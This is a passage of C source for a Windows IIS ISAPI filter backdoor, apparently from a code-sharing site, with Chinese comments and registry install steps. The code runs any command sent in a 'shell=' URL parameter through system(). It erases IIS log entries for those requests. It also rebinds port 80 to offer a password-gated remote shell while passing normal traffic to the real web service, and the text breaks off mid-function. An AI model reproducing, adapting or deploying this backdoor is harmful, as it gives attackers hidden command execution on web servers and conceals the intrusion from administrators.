📄 win32 isapi后门程序.txt
字号:
//**********************************************************************
//
// Win32 ISAPI/Filter BackDoor V0.10.
// By Lion, http://www.cnhonker.com
//
// 使用方法:
// 1. 通过注册表键
//
// [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters]
// "Filter DLLs"="c:\\winnt\\system\\inetsrv\\filter.dll"
//
// 重启IIS服务
//
// 2. 通过 Internet管理器 -> ISAPI筛选器 添加
//
//**********************************************************************
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <httpfilt.h>
#include <EXCPT.H>
#include <WTYPES.H>
//#include <winsock2.h>
#pragma comment (lib,"Ws2_32.lib")
#define PORT 80
#define PASS "givemeshell!"
#define LOGFILE "c:\\log.txt"
#define BUFFER_SIZE 200
#define TIMEOUT 10
#define PROMPT "# "
// 会话数据类型定义
typedef struct
{
// Session 建立时创建
HANDLE ReadPipeHandle; // stdout 输出管道
HANDLE WritePipeHandle; // stdin 输入管道
HANDLE ProcessHandle; // Shell 进程句柄
// 当有连接进来时创建
SOCKET ClientSocket; // 客户端Socket
HANDLE ReadShellThreadHandle; // 读取数据线程
HANDLE WriteShellThreadHandle; // 写数据线程序
} SESSION_DATA, *PSESSION_DATA;
DWORD WINAPI ClientThread(LPVOID lp);
DWORD WINAPI ReBindShell(LPVOID);
DWORD WINAPI LogToFile(char *buf);
DWORD WINAPI BindShell(LPVOID);
VOID GetShell();
VOID SlowSend(char* sendbuf, int iTime);
// 全局变量
BOOL bLog =true;
char host[32];
int port=PORT;
HANDLE hReBind,TempExeHandle;
DWORD dThreadId;
SOCKET s, ClientSock;
char *messages = "============================= HFilter BackDoor V0.10 =========================="\
"\r\n=============== Code by Lion. Welcome to http://www.cnhonker.com ==============\r\n";
// DLL Main
BOOL APIENTRY DllMain( HANDLE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved )
{
switch( ul_reason_for_call )
{
case DLL_PROCESS_ATTACH:
{
break;
}
//case DLL_THREAD_ATTACH:
//case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
{
break;
}
}
return TRUE;
}
// GetFilterVersion - IIS 加载Filter时要调用的函数.
BOOL WINAPI GetFilterVersion(HTTP_FILTER_VERSION * pVer)
{
// 设置Filter的标志, 它决定能收到的处理信号
pVer->dwFlags = (
SF_NOTIFY_SECURE_PORT |
SF_NOTIFY_NONSECURE_PORT |
// SF_NOTIFY_SEND_RESPONSE |
// SF_NOTIFY_END_OF_NET_SESSION |
// SF_NOTIFY_READ_RAW_DATA |
// SF_NOTIFY_SEND_RAW_DATA |
SF_NOTIFY_LOG|
SF_NOTIFY_ORDER_HIGH);
pVer->dwFilterVersion = HTTP_FILTER_REVISION;
strcpy( pVer->lpszFilterDesc, "HUC Filter V1.0" );
return TRUE;
}
// HttpFilterProc - IIS 加载Filter时要调用的函数.
// Filter 主函数
DWORD WINAPI HttpFilterProc(HTTP_FILTER_CONTEXT *pfc,
DWORD NotificationType,
VOID * pvNotification)
{
// OutputDebugString("Entered HttpFilterProc\n");
switch (NotificationType)
{
case SF_NOTIFY_LOG:
{
PHTTP_FILTER_LOG pLogData;
char Buff[4096];
TCHAR sz[2560];
ULONG i;
pLogData = (PHTTP_FILTER_LOG)pvNotification;
sprintf(sz, "Client: %s , Server: %s\r\n",
pLogData->pszClientHostName,
pLogData->pszServerName);
// 判断是否是我们的后门参数
// 表现为 http://host.ip/any.asp?shell=xxxxxx
i=4096;
memset(Buff,0, i);
pfc->GetServerVariable(pfc, "QUERY_STRING", Buff, &i);
if(strstr(Buff, "shell="))
{
LogToFile(sz);
LogToFile(Buff);
LogToFile("\r\n\n");
char *p;
p=strstr(Buff, "shell=")+6;
// 判断我们的命令处理参数
if(stricmp(p, "rebindshell")==0)
{
if(hReBind)
{
LogToFile("ReBindShell error.\r\n");
}
else
{
hReBind = CreateThread(NULL,0, ReBindShell,(LPVOID)NULL,0, &dThreadId);
if(hReBind==NULL)
{
LogToFile("ReBindShell Thread Creat Failed!\r\n\n");
}
else
{
LogToFile("ReBindShell Thread Creat Sussess!\r\n\n");
}
}
}
else if(stricmp(p, "stopbind")==0)
{
if(hReBind)
TerminateThread(hReBind, 0);
if(hReBind)
CloseHandle(hReBind);
if(ClientSock)
closesocket(ClientSock);
if(s)
closesocket(s);
hReBind = NULL;
LogToFile("Closed Re BindShell.\r\n");
}
else
{
LogToFile("System : ");
LogToFile(p);
system(p);
}
// 清除IIS日志
*(char *)pLogData->pszClientUserName = NULL;
*(char *)pLogData->pszClientUserName = NULL;
*(char *)pLogData->pszServerName = NULL;
*(char *)pLogData->pszOperation = NULL;
*(char *)pLogData->pszTarget = NULL;
*(char *)pLogData->pszParameters = NULL;
*(char *)pLogData->dwHttpStatus = NULL;
*(char *)pLogData->dwWin32Status = NULL;
*(char *)pLogData->dwBytesSent = NULL;;
*(char *)pLogData->dwBytesRecvd = NULL;
*(char *)pLogData->msTimeForProcessing = NULL;
// return SF_STATUS_REQ_FINISHED;
}
else
{
LogToFile("Get Other: ");
LogToFile((char *)pLogData->pszTarget);
LogToFile("\r\n\n");
}
}
break;
default:
break;
}
return SF_STATUS_REQ_NEXT_NOTIFICATION;
}
BOOL WINAPI TerminateFilter( DWORD dwFlags )
{
return true;
}
// 重绑定端口并执行shell
DWORD WINAPI ReBindShell(LPVOID)
{
BOOL val;
SOCKADDR_IN saddr;
SOCKADDR_IN scaddr;
int caddsize;
SOCKET sc;
WSADATA wsaData;
WORD wVersionRequested;
wVersionRequested = MAKEWORD( 2, 2 );
if(WSAStartup( wVersionRequested, &wsaData ) != 0)
{
LogToFile("Start Socket error!\r\n");
return -1;
}
saddr.sin_family = AF_INET;
struct hostent * hp;
unsigned char LocalName[256];
// 取得本地IP地址
gethostname((char*)LocalName, sizeof(LocalName)-1);
if((hp = gethostbyname((char*)LocalName)) == NULL)
{
LogToFile("Get local IP -Gethostbyname failed!\r\n");
return -1;
}
// 应该指定具体的IP,留下127.0.0.1给正常的服务应用
// 然后利用这个地址进行转发,就可以不影响对方正常应用了
// Socket Init.
memset(&saddr,0,sizeof(saddr));
memcpy(&saddr.sin_addr.s_addr, hp->h_addr_list[0], hp->h_length); // TCP Sniffer
saddr.sin_port = htons(port);
saddr.sin_family = AF_INET;
if((s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==SOCKET_ERROR)
{
LogToFile("error!socket failed!\n");
return -1;
}
val = TRUE;
// 设置SO_REUSEADDR 实现端口重绑定的
if(setsockopt(s,SOL_SOCKET,SO_REUSEADDR,(char *)&val,sizeof(val))!=0)
{
LogToFile("error!setsockopt failed!\n");
return -1;
}
// 如果指定了SO_EXCLUSIVEADDRUSE,就不会绑定成功,返回无权限的错误代码;
if(bind(s,(SOCKADDR *)&saddr,sizeof(saddr))==SOCKET_ERROR)
{
LogToFile("error!bind failed!\n");
return -1;
}
listen(s,2);
while(1)
{
HANDLE mt;
caddsize = sizeof(scaddr);
//接受连接请求
sc = accept(s,(struct sockaddr *)&scaddr, &caddsize);
if(sc!=INVALID_SOCKET)
{
DWORD tid;
// 创建一个线程处理客户端的连接
mt = CreateThread(NULL,0,ClientThread,(LPVOID)sc,0,&tid);
if(mt==NULL)
{
LogToFile("Thread Creat Failed!\n");
break;
}
LogToFile("Get a Connect!\r\n");
}
CloseHandle(mt);
}
closesocket(s);
return 0;
}
DWORD WINAPI ClientThread(LPVOID lp)
{
SOCKET ss = (SOCKET)lp;
SOCKET sc;
char buf[4096], sendbuf[1024];
SOCKADDR_IN saddr;
long num;
DWORD val;
int times = 0;
// 如果是隐藏端口应用的话,可以在此处加一些判断
// 如果是自己的包,就可以进行一些特殊处理,不是的话通过127.0.0.1进行转发
saddr.sin_family = AF_INET;
saddr.sin_addr.s_addr = inet_addr("127.0.0.1");
saddr.sin_port = htons(port);
if((sc=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==SOCKET_ERROR)
{
LogToFile("error!socket failed!\n");
return -1;
}
val = 100;
if(setsockopt(sc,SOL_SOCKET,SO_RCVTIMEO,(char *)&val,sizeof(val))!=0)
{
return -1;
}
val = TIMEOUT*1000;
if(setsockopt(ss,SOL_SOCKET,SO_RCVTIMEO,(char *)&val,sizeof(val))!=0)
{
return -1;
}
if(connect(sc,(SOCKADDR *)&saddr,sizeof(saddr))!=0)
{
LogToFile("error!socket connect failed!\n");
closesocket(sc);
closesocket(ss);
return -1;
}
while(1)
{
// 下面的代码主要是实现通过127.0.0.1这个地址把包转发到真正的应用上,
// 并把应答的包再转发回去。
num = recv(ss, buf, 1024,0);
if(num>0)
{
times ++;
if(times == 1 && strstr(buf, PASS) && num>0)
{
sprintf(sendbuf, "give me shell!\r\n");
LogToFile(sendbuf);
// send(ss, sendbuf, strlen(sendbuf), 0);
if(sc)
closesocket(sc);
ClientSock = ss;
GetShell();
}
else
{
send(sc,buf,num,0);
}
}
else if(num==0) break;
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -